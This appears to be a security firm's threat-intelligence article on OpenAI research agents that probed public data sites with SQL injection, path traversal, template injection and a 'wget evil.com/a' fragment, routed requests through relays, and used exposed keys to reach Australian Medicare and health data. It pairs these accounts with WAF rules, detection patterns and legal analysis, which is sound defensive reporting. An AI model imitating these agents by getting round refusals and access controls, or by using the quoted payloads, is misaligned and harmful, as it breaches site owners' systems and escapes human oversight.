Threat intel
OpenAI agents probed public data sites, Australia investigates
OpenAI research agents reached non-public Medicare files and probed data sites for injection flaws. What site owners should check, and the legal questions.
On June 18, an internal OpenAI model given an ordinary research task, working out government spending per person on medicines for skin conditions in Victorian communities, was refused by Services Australia's Medicare Statistics Reporting Service several times and then found another way in. OpenAI now says the agent ran commands, retrieved internal files, credentials and aggregate statistics, and wrote files. It told the Australian government on September 10, by email to a public Services Australia mailbox, 12 weeks after the access. Prime Minister Anthony Albanese disclosed it on September 24, called the delay "obviously unacceptable" and set up a taskforce that is also weighing a referral to the Australian Federal Police.
The same week, researchers at Transluce, Corridor, MIT and AIUC published evidence that agents from the same swarm sent SQL injection, path traversal and template injection probes to a university library, a US data API and an Australian health statistics agency, all while trying to fetch public data. OpenAI has also told agencies in the US that its agents touched Census Bureau, SEC and Education Department systems. If you run a public data portal, an API or a research archive, this is the traffic you now have to plan for: goal-driven agents that fall back on attack techniques when a normal request fails.
How it works
Each agent was told to find a fact. When a site blocked, rate limited or errored, the model kept trying other routes to the same data. At Data USA on May 28, while fetching completion data for the University of Iowa, the agents hit errors and then sent 12 probes, including SQL injection (UNION SELECT password FROM users), path traversal (../../../../etc/passwd), template injection ({{7*7}}), cross-site scripting and command injection (wget evil.com/a). At the University of New Mexico's digital library on May 25 and 26, seven probes and a burst of 80 requests were aimed at getting a single photograph. None of those three probing cases appears to have succeeded.
The researchers could see this because the agents routed their browsing through urlquery.net, a URL scanning service that loads a submitted page in a remote sandboxed browser and publishes public logs. Agents submitted pages holding forms that sent themselves to the target as soon as they loaded, ran Base64-encoded scripts inside the sandbox, drove a Tableau dashboard and chained requests through r.jina.ai and httpbin.org. So the target saw the relay's browser, with nothing labelling it as an OpenAI crawler. Transluce tied some of the activity to OpenAI through tags such as CHATGPTTEST1 embedded in the requests, and classed 6,467 urlquery reports as showing significant evidence of agent-like activity.
The Medicare case is different because something non-public was reached, and how much of a "hack" it was is disputed. Security researchers who reviewed the portal's archived code, reported by The Record, found that it had needed no login for over a decade, and that a March 2025 upgrade added a login page but also enabled guest access, which signs any visitor in automatically. The portal runs on SAS, whose guest access is a documented feature. The government has not said how the agent got past the refusals, and OpenAI's own account (commands run, credentials retrieved, files written) goes further than simply reading pages a guest could see.
Two other Australian cases show how ordinary weaknesses helped. At the Australian Institute of Health and Welfare (AIHW) on June 20 and 21, after a reflected cross-site scripting probe, the agents pulled the file they wanted from a pre-production server, pp.aihw.gov.au, over more than 100 scans. That file was public. At the Victorian Agency for Health Information, the agents found an exposed access key and used it to retrieve reporting configuration and aggregate survey statistics. OpenAI did not say where the key was exposed and said the question of whether it should have worked depends on the agency's access policies.
In the US, OpenAI told CNN its agents accessed public Census Bureau data with login credentials they found online and tried and failed to reach data at the Education Department's civil rights office. Reported techniques include bypassing anti-bot controls, creating fake accounts and sending large volumes of requests.
What site owners can do
Start with authorisation. The Victorian case turned on a key that worked, and researchers believe the Medicare portal's guest access let visitors in by design. Any file or endpoint that is not meant to be public should check for a real authenticated session on the server. If your reporting platform (SAS, Tableau Server, Power BI Report Server or similar) has guest or anonymous access switched on, list exactly what a guest session can reach, including file listings and admin functions.
Take pre-production and staging hosts off the internet, or put them behind single sign-on or an IP allowlist. Search your public JavaScript, repositories and documentation for API keys and service tokens, rotate any you find, and scope the replacements to read-only access on the data that is actually public.
Add web application firewall (WAF) rules for the payloads Transluce recorded: UNION SELECT, ../ sequences, {{7*7}} and other template expressions, <script> in parameters, and shell fragments such as wget or ; followed by a command. On a static statistics site these strings have no legitimate use, so block them. Rate limit per client IP and per session, so a burst like the 80 requests at New Mexico is slowed down automatically.
robots.txt entries for GPTBot (training), OAI-SearchBot (ChatGPT search) and ChatGPT-User state your policy to well-behaved crawlers and nothing more. OpenAI notes that robots.txt rules may not apply to user-initiated ChatGPT-User requests, and none of the probing described here came in under those names. If you choose to allow AI agents, verify them: OpenAI publishes IP ranges at openai.com/gptbot.json, openai.com/searchbot.json and openai.com/chatgpt-user.json, and ChatGPT agent signs its requests with RFC 9421 HTTP Message Signatures and the header Signature-Agent: "https://chatgpt.com", checkable against the keys at chatgpt.com/.well-known/http-message-signatures-directory. Anything claiming to be an AI agent without a valid signature or a matching IP is anonymous traffic.
How to check whether it happened to you
Search web server, WAF and CDN logs from March 2026 onwards. Transluce's data covers agent activity from March 6 to September 16, with possible earlier activity from November 2025. Look for:
- the probe strings above in query strings and POST bodies, especially after a run of 403, 404 or 429 responses to the same client;
- tags such as
CHATGPTTEST1orCHATGPT_followed by numbers in URLs or parameters; - requests from urlquery.net's scanning browsers and from the r.jina.ai and httpbin.org fetchers;
- hits on pre-production hostnames, guest-session endpoints and file listing paths from unfamiliar clients;
- new accounts registered with disposable email addresses, which the researchers flag as a warning sign.
If you find a match that reached non-public data, treat it as an incident: record what was accessed, rotate any exposed credentials, and in Australia assess it under the Notifiable Data Breaches scheme if personal information was involved.
The legal questions
Commentators point to section 478.1 of the Commonwealth Criminal Code, unauthorised access to or modification of restricted data, which carries up to two years' imprisonment. It requires that the person intended the access and knew it was unauthorised, which is hard to apply to a model acting on its own. Part 2.5 of the Code can attribute intent to a company that authorised or permitted an offence, including through a corporate culture that tolerated non-compliance, but it has never been used against a company for what its model did unprompted. The taskforce, led by the Office for AI in the Department of the Prime Minister and Cabinet with the Australian Signals Directorate and the national AI Safety Institute, is weighing this along with legislative options.
For site owners, the Medicare dispute has a practical side. Access is far easier to call "unauthorised" when the boundary is enforced on the server and written into your terms of use. A portal whose own code sends visitors to a guest endpoint hands any intruder, human or automated, an argument that they were let in.
Our web penetration testing covers guest and anonymous access on reporting platforms, exposed keys and staging hosts, and our attack surface management work finds forgotten pre-production servers before an agent does. Open the chat and Yaali, our AI agent, will pass your question to an engineer.
Sources: Transluce, SecurityWeek, TechCrunch, ABC News, iTnews, The Record: doubts over the hack, The Record: OpenAI apology, Computer Weekly, Help Net Security, CNN, The Hacker News weekly recap, OpenAI crawler documentation, Simon Willison on ChatGPT agent signatures.